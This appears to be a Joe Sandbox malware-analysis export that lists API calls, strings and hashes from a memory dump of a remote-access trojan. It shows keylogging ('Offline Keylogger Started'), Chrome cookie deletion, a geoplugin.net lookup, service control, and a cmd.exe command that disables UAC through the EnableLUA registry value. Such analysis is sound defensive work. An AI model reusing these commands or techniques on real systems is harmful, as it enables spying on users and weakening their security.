                                      • API String ID: 3431551938-0
                                      • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                      • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                      • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                      • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                      APIs
                                      • _free.LIBCMT ref: 00446741
                                      • _free.LIBCMT ref: 00446765
                                      • _free.LIBCMT ref: 004468EC
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                      • _free.LIBCMT ref: 00446AB8
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                      • String ID:
                                      • API String ID: 314583886-0
                                      • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                      • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                      • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                      • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                      APIs
                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                      • __fassign.LIBCMT ref: 00447814
                                      • __fassign.LIBCMT ref: 0044782F
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                      • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                      • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                      • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                      • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                      • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                      • InternetCloseHandle.WININET(00000000), ref: 00419407
                                      • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 004193A2
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                      • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                      • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                                      • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                      APIs
                                        • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                      • _free.LIBCMT ref: 0044E128
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 0044E133
                                      • _free.LIBCMT ref: 0044E13E
                                      • _free.LIBCMT ref: 0044E192
                                      • _free.LIBCMT ref: 0044E19D
                                      • _free.LIBCMT ref: 0044E1A8
                                      • _free.LIBCMT ref: 0044E1B3
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                      • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                      • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                      • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                      APIs
                                        • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                        • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                        • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                        • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                      • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                      • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                      • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                                      • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                                      APIs
                                      • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                      • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                      • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                      • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                      • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                      • GetLastError.KERNEL32 ref: 0040AA28
                                      Strings
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                      • UserProfile, xrefs: 0040A9EE
                                      • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                      • [Chrome Cookies not found], xrefs: 0040AA42
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                      • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                      • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                                      • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                      APIs
                                      • __allrem.LIBCMT ref: 00438A09
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                      • __allrem.LIBCMT ref: 00438A3C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                      • __allrem.LIBCMT ref: 00438A71
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                      • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                      • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                      • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 2936374016-3206640213
                                      • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                      • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                      • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                                      • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                      • int.LIBCPMT ref: 0040F8D7
                                        • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                        • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                      • std::_Facet_Register.LIBCPMT ref: 0040F917
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                      • __Init_thread_footer.LIBCMT ref: 0040F97F
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID:
                                      • API String ID: 3815856325-0
                                      • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                      • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                      • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                      • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 0040949C
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                      • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                      • GetKeyState.USER32(00000010), ref: 004094B8
                                      • GetKeyboardState.USER32(?), ref: 004094C5
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                      • String ID:
                                      • API String ID: 3566172867-0
                                      • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                      • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                                      • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                                      • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                                      APIs
                                      • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                      • _free.LIBCMT ref: 0044575C
                                      • _free.LIBCMT ref: 00445784
                                      • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                      • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                      • _abort.LIBCMT ref: 004457A3
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                      • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                      • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                      • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                      • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                      • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                      • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                                      • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                                      • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                                      • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                      • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                                      • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                                      • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                                      • wsprintfW.USER32 ref: 0040A13F
                                        • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      • API String ID: 1497725170-248792730
                                      • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                      • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                      • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                                      • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                      • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID: h G
                                      • API String ID: 1958988193-3300504347
                                      • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                      • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                      • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                      • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 0041B310
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                      • GetLastError.KERNEL32 ref: 0041B335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      • API String ID: 2877667751-2410386613
                                      • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                      • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                      • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                      • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                        • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00437631
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID: /zC
                                      • API String ID: 2633735394-4132788633
                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                      • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                      • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                      • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID: ]tA
                                      • API String ID: 4116985748-3517819141
                                      • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                      • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                      • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                      • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                      APIs
                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                      Strings
                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                      • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      • API String ID: 2922976086-4183131282
                                      • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                      • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                      • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                      • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_400000_ngen.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                      • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                      • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                      • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
